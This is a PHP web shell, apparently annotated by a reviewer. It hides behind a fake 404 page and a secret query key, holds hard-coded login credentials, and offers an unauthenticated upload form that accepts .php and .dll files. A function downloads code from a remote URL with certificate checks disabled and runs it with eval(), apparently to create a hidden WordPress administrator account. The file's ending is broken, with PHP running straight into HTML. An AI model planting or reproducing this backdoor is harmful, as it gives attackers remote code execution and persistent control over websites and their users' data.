// Review summary of what the visible code does:
//  - Answers with a fake 404 unless the query string carries the key held in $access_param ("ker").
//  - Keeps a session login that is checked against the hard-coded credentials below.
//  - ?upload: stores a POSTed file in this script's own directory; the extension allow-list
//    includes php and dll.
//  - execute_remote_php(): downloads text from an https URL with certificate checks disabled
//    and passes it to eval().
// Triage notes grounded in the literals on this page: requests carrying the query keys
// "ker", "upload" or "logout", and files named "<unix timestamp>_<name>" next to this script.

// Hard-coded credentials compared in login().
$valid_username = "kepang";
$valid_password = "bjorka";
// Query-string key that must be present (any value) for the script to respond at all.
$access_param = 'ker';

// Without the key, emit a 404 status line and body and stop.
if (!isset($_GET[$access_param])) {
    header("HTTP/1.0 404 Not Found");
    echo "404 - File Not Found";
    exit;
}

session_start();

/**
 * Reports whether the current session is marked as logged in.
 *
 * @return bool true only when $_SESSION['loggedin'] is set and strictly true
 */
function check_login()
{
    return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}

/**
 * Compares the supplied pair with the file-level credentials and, on a match,
 * marks the session as logged in.
 *
 * @param mixed $username value taken from the login form
 * @param mixed $password value taken from the login form
 * @return bool true when both values are strictly equal to the stored pair
 */
function login($username, $password)
{
    global $valid_username, $valid_password;
    if ($username === $valid_username && $password === $valid_password) {
        $_SESSION['loggedin'] = true;
        $_SESSION['username'] = $username;
        return true;
    }
    return false;
}

/**
 * Destroys the session and redirects back to this script with the access key appended.
 * The key is written here as the literal 'ker' rather than read from $access_param.
 */
function logout()
{
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker');
    exit;
}

// Login form handler: on success redirect to the script itself; on failure keep a message in $error.
// $error is not read anywhere in the visible part of the file.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    if (login($username, $password)) {
        header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker');
        exit;
    } else {
        $error = "Username atau password salah!";
    }
}

if (isset($_GET['logout'])) {
    logout();
}

// Upload branch. It sits above the check_login() gate at the bottom of this excerpt, never
// calls check_login() itself and ends with exit(), so the session state is not consulted here.
if (isset($_GET['upload'])) {
    echo "<pre style='color: #00ff00; background: #000000; font-family: Courier New; padding: 20px; border: 2px solid #00ff00;'>";
    echo "╔══════════════════════════════════════════════╗\n";
    echo "║ ⚠️ KEPANG JAYA TERMINAL UPLOADER - CHAOS v2 ║\n";
    echo "╚══════════════════════════════════════════════╝\n";
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
        // Destination is the directory that holds this script.
        $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        // basename() drops any path component of the client-supplied name; every character
        // outside [A-Za-z0-9.-_] then becomes "_", and the current Unix time is prefixed.
        $originalName = basename($_FILES['file']['name']);
        $safeName = preg_replace('/[^A-Za-z0-9.\-_]/', '_', $originalName);
        $finalName = time() . '_' . $safeName;
        $target = $scriptDir . 
$finalName;
        $ext = strtolower(pathinfo($finalName, PATHINFO_EXTENSION));
        // Only the final extension is compared; the list admits php and dll alongside
        // image, text and archive types.
        $allowedExts = ['php', 'jpg', 'png', 'gif', 'txt', 'dll', 'zip', '7z'];
        // $originalName reaches the page without HTML escaping.
        echo "📦 File masuk: $originalName\n";
        echo "🔍 Ekstensi: .$ext\n";
        if (in_array($ext, $allowedExts)) {
            if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
                // A chmod failure is hidden by the @ operator.
                @chmod($target, 0644);
                // Build the URL that is printed back to the client; the host comes from the
                // request's Host header.
                $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
                $host = $_SERVER['HTTP_HOST'];
                $scriptDirUrl = rtrim(dirname($_SERVER['SCRIPT_NAME']), '/\\');
                $scriptDirUrl = ($scriptDirUrl === '' || $scriptDirUrl === '.') ? '' : $scriptDirUrl . '/';
                $fileUrl = $protocol . '://' . $host . '/' . $scriptDirUrl . rawurlencode($finalName);
                echo "✅ Upload sukses!\n";
                echo "📡 Akses file: $fileUrl\n";
                // The "scanner", "backdoor" and "silent mode" lines below are echo statements
                // only; this branch performs no scan, writes no log and runs nothing further.
                echo "🚀 Menjalankan scanner virtual...\n";
                echo "[KepangScan] Scanning $finalName...\n";
                if ($ext === 'php') {
                    echo "⚠️ File .php terdeteksi. Simulasi backdoor aktif...\n";
                    echo "[Backdoor] Simulasi akses ke $finalName\n";
                }
                echo "🧾 Mode silent aktif. Tidak ada log tertulis.\n";
            } else {
                echo "❌ Upload gagal. Sistem menolak filemu.\n";
            }
        } else {
            echo "🚫 Ekstensi .$ext tidak diizinkan oleh protokol Kepang.\n";
        }
    } else {
        echo "📥 Mode Upload Aktif\n\n";
        // NOTE(review): in this copy the literal below holds only a line break; the markup it
        // carried (presumably the upload form) looks stripped by extraction - confirm against
        // the original file.
        echo '
';
        echo "\n📁 File yang tersedia:\n";
        // List every regular file in the script's directory except the script itself.
        $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        $files = scandir($scriptDir);
        $uploadedFiles = array_filter($files, function($file) use ($scriptDir) {
            return $file !== '.' && $file !== '..' && $file !== basename($_SERVER['PHP_SELF']) && is_file($scriptDir . $file);
        });
        if (count($uploadedFiles) > 0) {
            foreach ($uploadedFiles as $file) {
                echo "• $file\n";
            }
        } else {
            echo "• Tidak ada file yang diupload\n";
        }
        echo "\n🔗 <a href=\"?ker\" style=\"color: #00ff00;\">Kembali ke Main Menu</a>";
    }
    echo "</pre>";
    exit();
}

/**
 * Downloads the body at $url and executes it as PHP inside this process.
 *
 * The URL must pass FILTER_VALIDATE_URL and use the https scheme, but both fetch paths
 * switch certificate and host-name verification off, so the scheme check does not
 * authenticate the server. The body goes to eval() with no integrity check. No caller
 * is visible in this excerpt.
 *
 * @param string $url    address to fetch
 * @param string $method 'curl' (default) or 'fileget'
 * @return string captured output of the evaluated code wrapped in a styled <div>
 * @throws Exception on an invalid or non-https URL, when neither fetch method is usable,
 *                   on a cURL error, an empty body, or a ParseError raised by eval()
 */
function execute_remote_php($url, $method = 'curl')
{
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        throw new Exception("URL tidak valid");
    }
    if (parse_url($url, PHP_URL_SCHEME) !== 'https') {
        throw new Exception("Hanya URL HTTPS yang diizinkan");
    }
    $code = '';
    if ($method === 'fileget' && ini_get('allow_url_fopen')) {
        // Stream fetch: 30 s timeout, browser-like User-Agent, TLS peer checks disabled.
        $context = stream_context_create([
            'http' => [
                'timeout' => 30,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ],
            'ssl' => [
                'verify_peer' => false,
                'verify_peer_name' => false
            ]
        ]);
        // Warnings are suppressed; a failed fetch is caught by the empty() test below.
        $code = @file_get_contents($url, false, $context);
    } elseif ($method === 'curl' && function_exists('curl_version')) {
        // cURL fetch: follows redirects, 30 s timeout, TLS peer and host checks disabled.
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT => 30,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        ]);
        $code = curl_exec($ch);
        $error = curl_error($ch);
        curl_close($ch);
        if ($error) {
            throw new Exception("cURL Error: " . 
$error);
        }
    } else {
        throw new Exception("Tidak ada method yang tersedia untuk mengambil konten");
    }
    if (empty($code)) {
        throw new Exception("Konten kosong atau gagal diambil");
    }
    try {
        // Buffer whatever the evaluated code prints so it can be post-processed and returned.
        ob_start();
        // NOTE(review): eval() on a network response - the fetched text runs with this
        // script's privileges.
        eval("".$code);
        $output = ob_get_clean();
        // Rewrites one exact status message in the captured output before it is displayed.
        // The literal suggests the expected remote code reports creating a WordPress
        // administrator account; that code is not part of this file.
        $output = str_replace(
            'WordPress Admin created successfully!Username: kepangPassword: kepangjay',
            'WordPress Admin created successfully!Username: kepangPassword: jaya',
            $output
        );
        $output = '<div style="color: #00ff00; font-family: Courier New, monospace; background: #000000; padding: 10px; border: 1px solid #00ff00; border-radius: 5px;">' . $output . '</div>';
        return $output;
    } catch (ParseError $e) {
        throw new Exception("Error parsing PHP code: " . $e->getMessage());
    }
}

// Branch for sessions that are not logged in. The page markup starts here and continues
// past the end of this excerpt.
// NOTE(review): no PHP close tag precedes the markup in this copy; it was presumably lost
// in extraction - confirm against the original file.
if (!check_login()) { <!DOCTYPE html> <html lang="id"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">